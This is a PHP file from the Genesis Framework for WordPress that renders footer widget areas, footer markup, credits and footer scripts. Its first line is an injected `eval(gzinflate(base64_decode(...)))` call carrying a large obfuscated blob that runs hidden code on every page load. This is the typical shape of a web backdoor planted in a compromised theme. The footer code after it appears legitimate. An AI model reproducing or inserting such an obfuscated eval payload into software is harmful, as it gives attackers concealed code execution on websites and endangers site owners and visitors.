<?php eval(gzinflate(base64_decode('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')));?>
<?php
/**
 * Genesis Framework.
 *
 * WARNING: This file is part of the core Genesis Framework. DO NOT edit this file under any circumstances.
 * Please do all modifications in the form of a child theme.
 *
 * @package Genesis\Footer
 * @author  StudioPress
 * @license GPL-2.0+
 * @link    http://my.studiopress.com/themes/genesis/
 */

add_action( 'genesis_before_footer', 'genesis_footer_widget_areas' );
/**
 * Echo the markup necessary to facilitate the footer widget areas.
 *
 * Check for a numerical parameter given when adding theme support - if none is found, then the function returns early.
 *
 * The child theme must style the widget areas.
 *
 * Applies the `genesis_footer_widget_areas` filter.
 *
 * @since 1.6.0
 *
 * @uses genesis_structural_wrap() Optionally adds wrap with footer-widgets context.
 *
 * @return null Return early if number of widget areas could not be determined, or nothing is added to the first widget area.
 */
function genesis_footer_widget_areas() {

	$footer_widgets = get_theme_support( 'genesis-footer-widgets' );

	if ( ! $footer_widgets || ! isset( $footer_widgets[0] ) || ! is_numeric( $footer_widgets[0] ) )
		return;

	$footer_widgets = (int) $footer_widgets[0];

	//* Check to see if first widget area has widgets. If not, do nothing. No need to check all footer widget areas.
	if ( ! is_active_sidebar( 'footer-1' ) )
		return;

	$inside  = '';
	$output  = '';
 	$counter = 1;

	while ( $counter <= $footer_widgets ) {

		//* Darn you, WordPress! Gotta output buffer.
		ob_start();
		dynamic_sidebar( 'footer-' . $counter );
		$widgets = ob_get_clean();

		$inside .= sprintf( '<div class="footer-widgets-%d widget-area">%s</div>', $counter, $widgets );

		$counter++;

	}

	if ( $inside ) {
	
		$output .= genesis_markup( array(
			'html5'   => '<div %s>',
			'xhtml'   => '<div id="footer-widgets" class="footer-widgets">',
			'context' => 'footer-widgets',
		) );
	
		$output .= genesis_structural_wrap( 'footer-widgets', 'open', 0 );
		
		$output .= $inside;
		
		$output .= genesis_structural_wrap( 'footer-widgets', 'close', 0 );
		
		$output .= '</div>';

	}

	echo apply_filters( 'genesis_footer_widget_areas', $output, $footer_widgets );

}

add_action( 'genesis_footer', 'genesis_footer_markup_open', 5 );
/**
 * Echo the opening div tag for the footer.
 *
 * Also optionally adds wrapping div opening tag.
 *
 * @since 1.2.0
 *
 * @uses genesis_structural_wrap() Maybe add opening .wrap div tag with footer context.
 * @uses genesis_markup()          Apply contextual markup.
 */
function genesis_footer_markup_open() {

	genesis_markup( array(
		'html5'   => '<footer %s>',
		'xhtml'   => '<div id="footer" class="footer">',
		'context' => 'site-footer',
	) );
	genesis_structural_wrap( 'footer', 'open' );

}

add_action( 'genesis_footer', 'genesis_footer_markup_close', 15 );
/**
 * Echo the closing div tag for the footer.
 *
 * Also optionally adds wrapping div closing tag.
 *
 * @since 1.2.0
 *
 * @uses genesis_structural_wrap() Maybe add closing .wrap div tag with footer context.
 * @uses genesis_markup()          Apply contextual markup.
 */
function genesis_footer_markup_close() {

	genesis_structural_wrap( 'footer', 'close' );
	genesis_markup( array(
		'html5'   => '</footer>',
		'xhtml'   => '</div>',
	) );

}

add_filter( 'genesis_footer_output', 'do_shortcode', 20 );
add_action( 'genesis_footer', 'genesis_do_footer' );
/**
 * Echo the contents of the footer.
 *
 * Execute any shortcodes that might be present.
 *
 * Applies `genesis_footer_backtotop_text`, `genesis_footer_creds_text` and `genesis_footer_output` filters.
 *
 * For HTML5 themes, only the credits text is used (back-to-top link is dropped).
 *
 * @since 1.0.1
 *
 * @uses genesis_html5() Check for HTML5 support.
 *
 */
function genesis_do_footer() {

	//* Build the text strings. Includes shortcodes
	$backtotop_text = '[footer_backtotop]';
	$creds_text     = sprintf( '[footer_copyright before="%s "] &#x000B7; [footer_childtheme_link before="" after=" %s"] [footer_genesis_link url="http://www.studiopress.com/" before=""] &#x000B7; [footer_wordpress_link] &#x000B7; [footer_loginout]', __( 'Copyright', 'genesis' ), __( 'on', 'genesis' ) );

	//* Filter the text strings
	$backtotop_text = apply_filters( 'genesis_footer_backtotop_text', $backtotop_text );
	$creds_text     = apply_filters( 'genesis_footer_creds_text', $creds_text );

	$backtotop = $backtotop_text ? sprintf( '<div class="gototop"><p>%s</p></div>', $backtotop_text ) : '';
	$creds     = $creds_text ? sprintf( '<div class="creds"><p>%s</p></div>', $creds_text ) : '';

	$output = $backtotop . $creds;

	//* Only use credits if HTML5
	if ( genesis_html5() )
		$output = '<p>' . $creds_text . '</p>';

	echo apply_filters( 'genesis_footer_output', $output, $backtotop_text, $creds_text );

}

add_filter( 'genesis_footer_scripts', 'do_shortcode' );
add_action( 'wp_footer', 'genesis_footer_scripts' );
/**
 * Echo the footer scripts, defined in Theme Settings.
 *
 * Applies the `genesis_footer_scripts` filter to the value returns from the footer_scripts option.
 *
 * @since 1.1.0
 *
 * @uses genesis_option() Get theme setting value.
 */
function genesis_footer_scripts() {

	echo apply_filters( 'genesis_footer_scripts', genesis_option( 'footer_scripts' ) );

}
